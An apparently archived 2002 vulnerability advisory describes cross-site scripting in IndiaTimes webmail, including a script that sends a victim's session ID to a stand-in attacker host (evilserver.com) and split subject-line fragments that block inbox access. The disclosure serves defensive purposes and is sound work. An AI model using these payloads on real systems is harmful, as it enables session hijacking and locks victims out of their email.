IndiaTimes.com - Email - Session hijacking and Inbox Blocking
-------------------------------------------------------------------
Name      : IndiaTimes.com - Email - Session hijacking and Inbox Blocking
WebSite   : http://email.indiatimes.com
Date      : April 26, 2002
Vuln Type : Cross site scripting
Severity  : Moderate
Vendor    : Unknown
HomePage  : www.indiatimes.com
-------------------------------------------------------------------

DISCUSSION:
-------------------------------------------------------------------
Email.indiatimes.com is a very popular web-mail facility provided by
www.indiatimes.com, the online version of the newspaper 'The Times Of
India'. The script allows a user to embed HTML, and also JavaScript, in
a mail, so it is possible to insert malicious code into a message.
Although the site does not use cookies, it is still possible to hijack a
user's session by sending him a mail, even if he never reads that mail.

Let me put the whole discussion in dialogue form:

Q: How can a session be hijacked? The site doesn't use cookies.

A: The site doesn't use cookies, but the session ID/key is carried in a
   hidden form field on every page:

   <Form name=Rform ...>
     <input type=hidden name=SID value="some_random_number">
   </form>

   This SID is the only token required to authenticate the user, so a
   script placed in a mail can hand it to a script installed on a server
   the attacker controls, from where he can reuse it. Example:

   <script>
   self.location.href="http://evilserver.com/evil.cgi?SID="+Rform.SID.value
   </script>

Q: The user may choose not to read the attacker's mail. Then what?

A: After clicking 'Inbox', the whole list of mails appears, showing the
   subject and sender's address of each mail. A <SCRIPT> embedded by the
   sender in the 'Subject' is executed as soon as the user opens the
   inbox, so the user is exposed without opening the message at all.

Q: Hey, wait a minute. Only 30 characters of a 'Subject' are displayed.
   So if one tries to insert script in the 'Subject', he can only write
   13 characters of code (30 - strlen('<SCRIPT></SCRIPT>')).
   It is impossible to exploit the vulnerability above in 13 characters
   of code.

A: Well, it is possible. Let me show you. One may split the code into
   smaller parts and send the fragments in the subjects of separate
   mails, one after another, in this order:

   */</script>
   */history.go(-1)/*
   <script>/*

   This will not allow the user to open his inbox. Now see the beauty of
   comments and the reversed order of lines: the inbox shows the most
   recent message on top, so the display order is the reverse of the
   sending order and the fragments appear as

   <script>/*
   */history.go(-1)/*
   */</script>

   The /* ... */ comments swallow the HTML of the list rows lying between
   the fragments, joining the three subjects into one script.

Q: The user may disable JavaScript in the browser's settings.

A: Then the whole site stops working.

IMPACT:
---------------------------------------------------------------------
Because of the high number of users of Email.indiatimes.com, this
vulnerability poses a great risk.

SOLUTION:
---------------------------------------------------------------------
The vendor was notified but there has been no response so far. Users may
choose to use the Lynx version of Email.indiatimes.com instead.

DISCLAIMER:
---------------------------------------------------------------------
The information within this document may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event
shall the author be liable for any consequences whatsoever arising out
of or in connection with the use or spread of this information. Any use
of this information lies within the user's responsibility.

FEEDBACK:
---------------------------------------------------------------------
In case of any queries, please don't hesitate to drop me a mail.

Thanks,

*************************|<<---/\--->>|***********************************
Sandeep Giri                   | For finding anything you need two things:
System Administrator(Intranet) | 1. Will
Indian Institute of Technology | 2. Google
Roorkee-247667, India          |
*************************|<<---\/--->>|***********************************
This archive was generated by hypermail 2b30 : Fri Apr 26 2002 - 13:48:58 PDT